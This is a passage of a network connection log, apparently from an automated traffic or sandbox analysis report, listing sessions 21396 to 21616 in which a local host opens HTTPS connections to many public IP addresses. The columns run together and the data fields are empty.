                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21396192.168.2.1540810183.226.253.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21397192.168.2.154904012.145.63.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21398192.168.2.155502042.152.62.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21399192.168.2.1559606188.22.251.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21400192.168.2.1544072126.239.57.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21401192.168.2.155899231.162.207.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21402192.168.2.1547960189.126.105.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21403192.168.2.1555584167.223.4.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21404192.168.2.1553648151.33.252.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21405192.168.2.1548970170.62.235.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21406192.168.2.154280870.241.255.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21407192.168.2.1560374156.103.165.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21408192.168.2.1541470203.140.215.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21409192.168.2.1546844165.62.139.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21410192.168.2.1547256102.199.64.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21411192.168.2.1545212146.113.235.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21412192.168.2.1552710146.252.184.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21413192.168.2.154194849.20.96.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21414192.168.2.154989620.70.64.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21415192.168.2.1552088109.175.155.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21416192.168.2.154988654.219.190.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21417192.168.2.1549310162.85.44.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21418192.168.2.1540328175.1.122.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21419192.168.2.155659440.24.97.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21420192.168.2.1555722114.250.112.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21421192.168.2.155905034.154.23.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21422192.168.2.1543462211.38.243.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21423192.168.2.154037244.238.225.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21424192.168.2.1544130137.162.60.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21425192.168.2.155758645.111.148.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21426192.168.2.1559414131.196.67.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21427192.168.2.15586165.171.129.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21428192.168.2.1547506138.91.150.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21429192.168.2.1541766216.89.50.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21430192.168.2.155442268.75.125.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21431192.168.2.155203492.234.39.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21432192.168.2.1539810203.2.1.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21433192.168.2.155760280.91.102.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21434192.168.2.154675071.211.129.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21435192.168.2.155470619.253.177.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21436192.168.2.1545992121.47.92.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21437192.168.2.155916417.64.45.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21438192.168.2.155393279.2.194.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21439192.168.2.1542274212.236.129.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21440192.168.2.155070024.224.168.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21441192.168.2.154171432.171.14.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21442192.168.2.1557410178.157.96.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21443192.168.2.1544128210.27.241.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21444192.168.2.153929020.45.208.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21445192.168.2.1560990131.115.188.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21446192.168.2.1539218145.5.178.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21447192.168.2.1558160172.52.139.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21448192.168.2.1546164108.169.53.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21449192.168.2.1534024106.95.201.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21450192.168.2.1533446205.67.160.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21451192.168.2.154184647.79.119.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21452192.168.2.1534878123.88.142.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21453192.168.2.1535850153.48.129.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21454192.168.2.1560622111.27.194.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21455192.168.2.1542286125.108.174.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21456192.168.2.154258613.177.184.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21457192.168.2.1551412153.88.149.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21458192.168.2.1551992181.32.205.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21459192.168.2.1551648186.35.169.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21460192.168.2.1558706142.184.255.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21461192.168.2.155787649.251.156.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21462192.168.2.15395888.220.41.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21463192.168.2.1555432119.176.232.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21464192.168.2.155201285.17.58.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21465192.168.2.1534990104.82.158.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21466192.168.2.1548420206.167.58.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21467192.168.2.15583428.244.102.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21468192.168.2.155965050.143.215.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21469192.168.2.1533344156.189.23.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21470192.168.2.153581685.90.49.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21471192.168.2.1537596184.89.244.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21472192.168.2.1534596128.177.134.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21473192.168.2.1551914152.249.131.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21474192.168.2.1560912209.106.200.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21475192.168.2.1546120187.59.34.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21476192.168.2.1538562139.224.5.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21477192.168.2.1556878213.72.111.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21478192.168.2.155985494.49.238.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21479192.168.2.1549232196.223.248.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21480192.168.2.154032073.165.54.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21481192.168.2.153526851.38.210.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21482192.168.2.153974863.18.137.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21483192.168.2.1556318220.171.231.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21484192.168.2.1541416194.12.8.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21485192.168.2.1560866143.122.239.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21486192.168.2.1551944148.97.29.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21487192.168.2.1556038118.108.151.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21488192.168.2.153346443.182.176.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21489192.168.2.1544712175.49.74.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21490192.168.2.154164654.147.57.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21491192.168.2.154401075.81.187.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21492192.168.2.1540960119.121.202.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21493192.168.2.1559276186.131.90.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21494192.168.2.1541242126.29.79.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21495192.168.2.1541132165.151.250.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21496192.168.2.1553360197.214.170.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21497192.168.2.1550956192.172.36.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21498192.168.2.1557834157.2.93.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21499192.168.2.1546332121.246.120.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21500192.168.2.1541598108.177.157.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21501192.168.2.1551750106.41.50.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21502192.168.2.1539080160.178.203.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21503192.168.2.1539052218.71.164.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21504192.168.2.155358253.79.208.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21505192.168.2.1555374117.51.217.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21506192.168.2.1556274186.245.96.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21507192.168.2.155793067.108.5.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21508192.168.2.1552768205.240.53.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21509192.168.2.155569612.190.185.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21510192.168.2.1552726154.206.21.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21511192.168.2.154820213.54.231.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21512192.168.2.154428819.41.195.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21513192.168.2.1543116185.121.47.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21514192.168.2.1536344193.165.104.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21515192.168.2.1548344219.42.59.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21516192.168.2.1541298147.69.92.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21517192.168.2.1557334170.52.67.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21518192.168.2.153523650.74.254.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21519192.168.2.1544256167.94.0.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21520192.168.2.1546198158.38.68.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21521192.168.2.1536562109.70.98.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21522192.168.2.1540852189.254.15.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21523192.168.2.153913224.68.13.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21524192.168.2.1539258166.156.242.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21525192.168.2.1541724178.163.238.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21526192.168.2.155031458.70.236.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21527192.168.2.1540716129.160.4.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21528192.168.2.1534540128.215.147.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21529192.168.2.154277063.232.199.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21530192.168.2.156028231.10.137.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21531192.168.2.153466045.244.107.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21532192.168.2.1542626122.173.247.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21533192.168.2.155974819.235.21.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21534192.168.2.1559878152.249.49.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21535192.168.2.1533650219.8.0.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21536192.168.2.154659076.180.71.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21537192.168.2.153481463.138.216.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21538192.168.2.1559402198.180.93.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21539192.168.2.153895271.116.54.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21540192.168.2.1555260209.216.244.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21541192.168.2.1547224193.108.36.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21542192.168.2.153307252.48.173.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21543192.168.2.153338046.240.152.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21544192.168.2.1557650111.41.241.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21545192.168.2.1555090174.254.54.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21546192.168.2.1543982109.245.179.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21547192.168.2.1547766213.207.195.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21548192.168.2.156053639.37.179.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21549192.168.2.15471242.149.129.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21550192.168.2.15413025.58.24.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21551192.168.2.154615237.197.46.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21552192.168.2.156094286.66.45.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21553192.168.2.1544118109.63.138.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21554192.168.2.153941213.47.7.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21555192.168.2.1552772134.115.72.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21556192.168.2.155246427.32.115.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21557192.168.2.1536482213.84.151.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21558192.168.2.1558742102.148.154.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21559192.168.2.1535248162.114.239.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21560192.168.2.1555122156.124.116.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21561192.168.2.1542378155.167.220.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21562192.168.2.154193641.78.54.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21563192.168.2.1539694199.116.214.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21564192.168.2.1553996176.190.172.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21565192.168.2.155184865.235.111.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21566192.168.2.1542362143.235.21.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21567192.168.2.155794472.30.177.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21568192.168.2.155996681.213.112.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21569192.168.2.15412682.31.238.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21570192.168.2.156096499.6.213.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21571192.168.2.1542578126.201.9.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21572192.168.2.153476450.96.212.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21573192.168.2.153910684.124.202.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21574192.168.2.1557280135.60.109.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21575192.168.2.1554434188.170.148.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21576192.168.2.153808297.208.163.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21577192.168.2.1559940137.142.62.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21578192.168.2.1536778126.69.196.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21579192.168.2.1534664121.16.36.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21580192.168.2.154487896.103.23.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21581192.168.2.1541534211.174.8.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21582192.168.2.15329644.110.31.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21583192.168.2.1533824199.204.116.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21584192.168.2.1552344117.36.87.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21585192.168.2.1540090187.237.48.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21586192.168.2.1539642162.63.3.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21587192.168.2.153693235.79.50.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21588192.168.2.153815264.126.3.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21589192.168.2.1545834216.187.106.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21590192.168.2.1554430104.26.162.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21591192.168.2.1537188182.197.75.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21592192.168.2.1538436161.19.31.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21593192.168.2.154832827.143.241.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21594192.168.2.1552244104.183.240.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21595192.168.2.15376721.210.49.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21596192.168.2.154135478.122.161.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21597192.168.2.1552810137.37.129.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21598192.168.2.153815495.154.111.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21599192.168.2.1553100125.81.25.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21600192.168.2.155528224.102.222.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21601192.168.2.1536520132.228.243.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21602192.168.2.1556940218.240.86.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21603192.168.2.154267832.112.222.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21604192.168.2.155804466.110.115.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21605192.168.2.1543116176.14.65.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21606192.168.2.1551880171.246.24.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21607192.168.2.1557990155.113.47.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21608192.168.2.155355080.70.83.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21609192.168.2.1554322180.97.85.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21610192.168.2.155582425.124.133.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21611192.168.2.1550894176.44.71.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21612192.168.2.154933047.66.81.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21613192.168.2.155953864.85.35.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21614192.168.2.154166283.160.245.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21615192.168.2.1536586182.14.144.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21616192.168.2.155388699.233.4.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
